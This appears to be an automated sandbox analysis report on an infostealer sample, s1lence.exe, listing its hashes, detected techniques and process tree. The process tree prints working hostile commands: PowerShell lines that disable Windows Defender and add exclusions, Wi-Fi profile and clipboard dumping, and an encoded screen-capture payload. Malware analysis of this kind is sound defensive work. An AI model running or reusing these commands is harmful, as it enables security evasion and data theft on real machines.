Analysis
-
max time kernel
134s -
max time network
131s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
23-05-2024 00:39
Behavioral task
behavioral1
Sample
s1lence.exe
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
s1lence.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
?�ӂ�S�.pyc
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
?�ӂ�S�.pyc
Resource
win10v2004-20240508-en
General
-
Target
s1lence.exe
-
Size
7.4MB
-
MD5
668d1db9a3a70c9ecf654475f3369485
-
SHA1
31819dd4a5948424b3aac16e99ded3839ad7a8c1
-
SHA256
379d24f9014f75bb932c77c65f7d9508d456cba86ec45b22c542a035626140d1
-
SHA512
a2bf16b8b092326372152758d1485893aa578540fa5997041a60e03a1f527ee8cf3a38221deecb9a0d1d27561c75948241a0e08c9270a924cd3b9cb4744306e6
-
SSDEEP
196608:RrCO0cDeKG4+Ljv+bhqNVoBKUh8mz4Iv9Plu1D7AL:0ieT4CL+9qz8/b4IzuRAL
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepid process 752 powershell.exe 4356 powershell.exe 3076 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
rar.exepid process 4076 rar.exe -
Loads dropped DLL 17 IoCs
Processes:
s1lence.exepid process 2448 s1lence.exe 2448 s1lence.exe 2448 s1lence.exe 2448 s1lence.exe 2448 s1lence.exe 2448 s1lence.exe 2448 s1lence.exe 2448 s1lence.exe 2448 s1lence.exe 2448 s1lence.exe 2448 s1lence.exe 2448 s1lence.exe 2448 s1lence.exe 2448 s1lence.exe 2448 s1lence.exe 2448 s1lence.exe 2448 s1lence.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI33762\python311.dll upx behavioral2/memory/2448-25-0x00007FFBF8690000-0x00007FFBF8C79000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI33762\_ctypes.pyd upx behavioral2/memory/2448-30-0x00007FFC0B550000-0x00007FFC0B573000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI33762\libffi-8.dll upx behavioral2/memory/2448-32-0x00007FFC0D720000-0x00007FFC0D72F000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI33762\libcrypto-3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI33762\_ssl.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI33762\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI33762\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI33762\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI33762\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI33762\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI33762\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI33762\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI33762\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI33762\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI33762\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI33762\libssl-3.dll upx behavioral2/memory/2448-54-0x00007FFC096B0000-0x00007FFC096DD000-memory.dmp upx behavioral2/memory/2448-56-0x00007FFC09690000-0x00007FFC096A9000-memory.dmp upx behavioral2/memory/2448-58-0x00007FFC09660000-0x00007FFC09683000-memory.dmp upx behavioral2/memory/2448-60-0x00007FFBF7CE0000-0x00007FFBF7E57000-memory.dmp upx behavioral2/memory/2448-64-0x00007FFC0D610000-0x00007FFC0D61D000-memory.dmp upx behavioral2/memory/2448-63-0x00007FFC07F20000-0x00007FFC07F39000-memory.dmp upx behavioral2/memory/2448-70-0x00007FFC07CF0000-0x00007FFC07DBD000-memory.dmp upx behavioral2/memory/2448-67-0x00007FFC07EE0000-0x00007FFC07F13000-memory.dmp upx behavioral2/memory/2448-72-0x00007FFBF77B0000-0x00007FFBF7CD2000-memory.dmp upx behavioral2/memory/2448-77-0x00007FFC08600000-0x00007FFC08614000-memory.dmp upx behavioral2/memory/2448-80-0x00007FFC0B550000-0x00007FFC0B573000-memory.dmp upx behavioral2/memory/2448-79-0x00007FFC09610000-0x00007FFC0961D000-memory.dmp upx behavioral2/memory/2448-78-0x00007FFC06F00000-0x00007FFC0701C000-memory.dmp upx behavioral2/memory/2448-76-0x00007FFBF8690000-0x00007FFBF8C79000-memory.dmp upx behavioral2/memory/2448-305-0x00007FFC07CF0000-0x00007FFC07DBD000-memory.dmp upx behavioral2/memory/2448-309-0x00007FFC06F00000-0x00007FFC0701C000-memory.dmp upx behavioral2/memory/2448-306-0x00007FFBF77B0000-0x00007FFBF7CD2000-memory.dmp upx behavioral2/memory/2448-304-0x00007FFC07EE0000-0x00007FFC07F13000-memory.dmp upx behavioral2/memory/2448-295-0x00007FFBF8690000-0x00007FFBF8C79000-memory.dmp upx behavioral2/memory/2448-302-0x00007FFC07F20000-0x00007FFC07F39000-memory.dmp upx behavioral2/memory/2448-301-0x00007FFBF7CE0000-0x00007FFBF7E57000-memory.dmp upx behavioral2/memory/2448-300-0x00007FFC09660000-0x00007FFC09683000-memory.dmp upx behavioral2/memory/2448-296-0x00007FFC0B550000-0x00007FFC0B573000-memory.dmp upx behavioral2/memory/2448-310-0x00007FFBF8690000-0x00007FFBF8C79000-memory.dmp upx behavioral2/memory/2448-334-0x00007FFC07EE0000-0x00007FFC07F13000-memory.dmp upx behavioral2/memory/2448-338-0x00007FFC06F00000-0x00007FFC0701C000-memory.dmp upx behavioral2/memory/2448-337-0x00007FFC08600000-0x00007FFC08614000-memory.dmp upx behavioral2/memory/2448-336-0x00007FFC07CF0000-0x00007FFC07DBD000-memory.dmp upx behavioral2/memory/2448-335-0x00007FFBF77B0000-0x00007FFBF7CD2000-memory.dmp upx behavioral2/memory/2448-333-0x00007FFC0D610000-0x00007FFC0D61D000-memory.dmp upx behavioral2/memory/2448-332-0x00007FFC07F20000-0x00007FFC07F39000-memory.dmp upx behavioral2/memory/2448-331-0x00007FFBF7CE0000-0x00007FFBF7E57000-memory.dmp upx behavioral2/memory/2448-330-0x00007FFC09660000-0x00007FFC09683000-memory.dmp upx behavioral2/memory/2448-329-0x00007FFC09690000-0x00007FFC096A9000-memory.dmp upx behavioral2/memory/2448-328-0x00007FFC096B0000-0x00007FFC096DD000-memory.dmp upx behavioral2/memory/2448-327-0x00007FFC0D720000-0x00007FFC0D72F000-memory.dmp upx behavioral2/memory/2448-326-0x00007FFC0B550000-0x00007FFC0B573000-memory.dmp upx behavioral2/memory/2448-325-0x00007FFC09610000-0x00007FFC0961D000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 8 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
WMIC.exeWMIC.exeWMIC.exepid process 4516 WMIC.exe 4816 WMIC.exe 4984 WMIC.exe -
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid process 4596 tasklist.exe 2020 tasklist.exe 4512 tasklist.exe 1976 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Suspicious behavior: EnumeratesProcesses 24 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 752 powershell.exe 1628 powershell.exe 1628 powershell.exe 752 powershell.exe 752 powershell.exe 1628 powershell.exe 4356 powershell.exe 4356 powershell.exe 2008 powershell.exe 2008 powershell.exe 3076 powershell.exe 3076 powershell.exe 2008 powershell.exe 3076 powershell.exe 2440 powershell.exe 2440 powershell.exe 3204 powershell.exe 3204 powershell.exe 1268 powershell.exe 1268 powershell.exe 1268 powershell.exe 3856 powershell.exe 3856 powershell.exe 3856 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
tasklist.exeWMIC.exepowershell.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 1976 tasklist.exe Token: SeIncreaseQuotaPrivilege 5036 WMIC.exe Token: SeSecurityPrivilege 5036 WMIC.exe Token: SeTakeOwnershipPrivilege 5036 WMIC.exe Token: SeLoadDriverPrivilege 5036 WMIC.exe Token: SeSystemProfilePrivilege 5036 WMIC.exe Token: SeSystemtimePrivilege 5036 WMIC.exe Token: SeProfSingleProcessPrivilege 5036 WMIC.exe Token: SeIncBasePriorityPrivilege 5036 WMIC.exe Token: SeCreatePagefilePrivilege 5036 WMIC.exe Token: SeBackupPrivilege 5036 WMIC.exe Token: SeRestorePrivilege 5036 WMIC.exe Token: SeShutdownPrivilege 5036 WMIC.exe Token: SeDebugPrivilege 5036 WMIC.exe Token: SeSystemEnvironmentPrivilege 5036 WMIC.exe Token: SeRemoteShutdownPrivilege 5036 WMIC.exe Token: SeUndockPrivilege 5036 WMIC.exe Token: SeManageVolumePrivilege 5036 WMIC.exe Token: 33 5036 WMIC.exe Token: 34 5036 WMIC.exe Token: 35 5036 WMIC.exe Token: 36 5036 WMIC.exe Token: SeDebugPrivilege 752 powershell.exe Token: SeDebugPrivilege 1628 powershell.exe Token: SeIncreaseQuotaPrivilege 5036 WMIC.exe Token: SeSecurityPrivilege 5036 WMIC.exe Token: SeTakeOwnershipPrivilege 5036 WMIC.exe Token: SeLoadDriverPrivilege 5036 WMIC.exe Token: SeSystemProfilePrivilege 5036 WMIC.exe Token: SeSystemtimePrivilege 5036 WMIC.exe Token: SeProfSingleProcessPrivilege 5036 WMIC.exe Token: SeIncBasePriorityPrivilege 5036 WMIC.exe Token: SeCreatePagefilePrivilege 5036 WMIC.exe Token: SeBackupPrivilege 5036 WMIC.exe Token: SeRestorePrivilege 5036 WMIC.exe Token: SeShutdownPrivilege 5036 WMIC.exe Token: SeDebugPrivilege 5036 WMIC.exe Token: SeSystemEnvironmentPrivilege 5036 WMIC.exe Token: SeRemoteShutdownPrivilege 5036 WMIC.exe Token: SeUndockPrivilege 5036 WMIC.exe Token: SeManageVolumePrivilege 5036 WMIC.exe Token: 33 5036 WMIC.exe Token: 34 5036 WMIC.exe Token: 35 5036 WMIC.exe Token: 36 5036 WMIC.exe Token: SeIncreaseQuotaPrivilege 4516 WMIC.exe Token: SeSecurityPrivilege 4516 WMIC.exe Token: SeTakeOwnershipPrivilege 4516 WMIC.exe Token: SeLoadDriverPrivilege 4516 WMIC.exe Token: SeSystemProfilePrivilege 4516 WMIC.exe Token: SeSystemtimePrivilege 4516 WMIC.exe Token: SeProfSingleProcessPrivilege 4516 WMIC.exe Token: SeIncBasePriorityPrivilege 4516 WMIC.exe Token: SeCreatePagefilePrivilege 4516 WMIC.exe Token: SeBackupPrivilege 4516 WMIC.exe Token: SeRestorePrivilege 4516 WMIC.exe Token: SeShutdownPrivilege 4516 WMIC.exe Token: SeDebugPrivilege 4516 WMIC.exe Token: SeSystemEnvironmentPrivilege 4516 WMIC.exe Token: SeRemoteShutdownPrivilege 4516 WMIC.exe Token: SeUndockPrivilege 4516 WMIC.exe Token: SeManageVolumePrivilege 4516 WMIC.exe Token: 33 4516 WMIC.exe Token: 34 4516 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
s1lence.exes1lence.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3376 wrote to memory of 2448 3376 s1lence.exe s1lence.exe PID 3376 wrote to memory of 2448 3376 s1lence.exe s1lence.exe PID 2448 wrote to memory of 4084 2448 s1lence.exe cmd.exe PID 2448 wrote to memory of 4084 2448 s1lence.exe cmd.exe PID 2448 wrote to memory of 1936 2448 s1lence.exe cmd.exe PID 2448 wrote to memory of 1936 2448 s1lence.exe cmd.exe PID 2448 wrote to memory of 3392 2448 s1lence.exe cmd.exe PID 2448 wrote to memory of 3392 2448 s1lence.exe cmd.exe PID 2448 wrote to memory of 1744 2448 s1lence.exe cmd.exe PID 2448 wrote to memory of 1744 2448 s1lence.exe cmd.exe PID 3392 wrote to memory of 1976 3392 cmd.exe tasklist.exe PID 3392 wrote to memory of 1976 3392 cmd.exe tasklist.exe PID 1744 wrote to memory of 5036 1744 cmd.exe WMIC.exe PID 1744 wrote to memory of 5036 1744 cmd.exe WMIC.exe PID 4084 wrote to memory of 752 4084 cmd.exe powershell.exe PID 4084 wrote to memory of 752 4084 cmd.exe powershell.exe PID 1936 wrote to memory of 1628 1936 cmd.exe powershell.exe PID 1936 wrote to memory of 1628 1936 cmd.exe powershell.exe PID 2448 wrote to memory of 3708 2448 s1lence.exe cmd.exe PID 2448 wrote to memory of 3708 2448 s1lence.exe cmd.exe PID 3708 wrote to memory of 2960 3708 cmd.exe reg.exe PID 3708 wrote to memory of 2960 3708 cmd.exe reg.exe PID 2448 wrote to memory of 4436 2448 s1lence.exe cmd.exe PID 2448 wrote to memory of 4436 2448 s1lence.exe cmd.exe PID 4436 wrote to memory of 4144 4436 cmd.exe reg.exe PID 4436 wrote to memory of 4144 4436 cmd.exe reg.exe PID 2448 wrote to memory of 4212 2448 s1lence.exe cmd.exe PID 2448 wrote to memory of 4212 2448 s1lence.exe cmd.exe PID 4212 wrote to memory of 4516 4212 cmd.exe WMIC.exe PID 4212 wrote to memory of 4516 4212 cmd.exe WMIC.exe PID 2448 wrote to memory of 3632 2448 s1lence.exe cmd.exe PID 2448 wrote to memory of 3632 2448 s1lence.exe cmd.exe PID 3632 wrote to memory of 4816 3632 cmd.exe WMIC.exe PID 3632 wrote to memory of 4816 3632 cmd.exe WMIC.exe PID 2448 wrote to memory of 3620 2448 s1lence.exe cmd.exe PID 2448 wrote to memory of 3620 2448 s1lence.exe cmd.exe PID 3620 wrote to memory of 4356 3620 cmd.exe powershell.exe PID 3620 wrote to memory of 4356 3620 cmd.exe powershell.exe PID 2448 wrote to memory of 4448 2448 s1lence.exe cmd.exe PID 2448 wrote to memory of 4448 2448 s1lence.exe cmd.exe PID 2448 wrote to memory of 1480 2448 s1lence.exe cmd.exe PID 2448 wrote to memory of 1480 2448 s1lence.exe cmd.exe PID 4448 wrote to memory of 4596 4448 cmd.exe tasklist.exe PID 4448 wrote to memory of 4596 4448 cmd.exe tasklist.exe PID 1480 wrote to memory of 2020 1480 cmd.exe tasklist.exe PID 1480 wrote to memory of 2020 1480 cmd.exe tasklist.exe PID 2448 wrote to memory of 3312 2448 s1lence.exe cmd.exe PID 2448 wrote to memory of 3312 2448 s1lence.exe cmd.exe PID 2448 wrote to memory of 2716 2448 s1lence.exe cmd.exe PID 2448 wrote to memory of 2716 2448 s1lence.exe cmd.exe PID 2448 wrote to memory of 1356 2448 s1lence.exe cmd.exe PID 2448 wrote to memory of 1356 2448 s1lence.exe cmd.exe PID 2448 wrote to memory of 2568 2448 s1lence.exe cvtres.exe PID 2448 wrote to memory of 2568 2448 s1lence.exe cvtres.exe PID 2448 wrote to memory of 4860 2448 s1lence.exe cmd.exe PID 2448 wrote to memory of 4860 2448 s1lence.exe cmd.exe PID 2448 wrote to memory of 2068 2448 s1lence.exe cmd.exe PID 2448 wrote to memory of 2068 2448 s1lence.exe cmd.exe PID 2448 wrote to memory of 1228 2448 s1lence.exe cmd.exe PID 2448 wrote to memory of 1228 2448 s1lence.exe cmd.exe PID 3312 wrote to memory of 1196 3312 cmd.exe WMIC.exe PID 3312 wrote to memory of 1196 3312 cmd.exe WMIC.exe PID 1356 wrote to memory of 4512 1356 cmd.exe tasklist.exe PID 1356 wrote to memory of 4512 1356 cmd.exe tasklist.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\s1lence.exe"C:\Users\Admin\AppData\Local\Temp\s1lence.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3376 -
C:\Users\Admin\AppData\Local\Temp\s1lence.exe"C:\Users\Admin\AppData\Local\Temp\s1lence.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\s1lence.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4084 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\s1lence.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:752 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1628 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3392 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1976 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5036 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:3708 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:2960
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:4144
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:4212 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:4516 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:3632 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:4816 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:3620 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4356 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4448 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4596 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2020 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:3312 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:1196
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵PID:2716
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2008 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4512 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:2568
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4412
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵PID:4860
-
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵PID:1320
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:2068
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:4632 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:1228
-
